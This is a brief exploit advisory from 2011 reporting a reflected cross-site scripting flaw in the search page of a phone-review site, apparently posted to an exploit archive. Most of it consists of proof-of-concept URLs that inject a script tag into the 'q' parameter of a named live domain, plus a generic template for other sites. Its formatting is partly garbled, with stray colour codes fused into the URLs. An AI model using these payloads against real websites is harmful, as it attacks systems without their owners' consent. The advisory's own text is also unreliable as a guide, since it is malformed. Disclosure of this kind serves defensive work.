#############################################
[#] Exploit Title: Amazon Reviewed Phones Cross Site Script Vuln.

[#] Author: MusticaN

[#] Date: 11.07.2011

[#] Demo: alert(XSS) color=#0000ffhttp://anormalguy.com/search.php?q=<script>alert(XSS)</script>

[#] Demo: http://anormalguy.com/search.php?q=http%3A%2F%2Fanormalguy.com%2Fsearch.php%3Fq%3D<script>alert%28“XSS“%29<%2Fscript>&sc=All

[#] Vuln Type: Reflected XSS

[#] Fixed : Zararli Karakterler Filitrelenmelidir.

##############################################

[*] ## Exploit ##:

[#] color=#0000ffhttp://site.com/search.php?q=search&search=XSSAttack]

[#] Inject XSS Code ~~>> GET / search=XSS

###############################################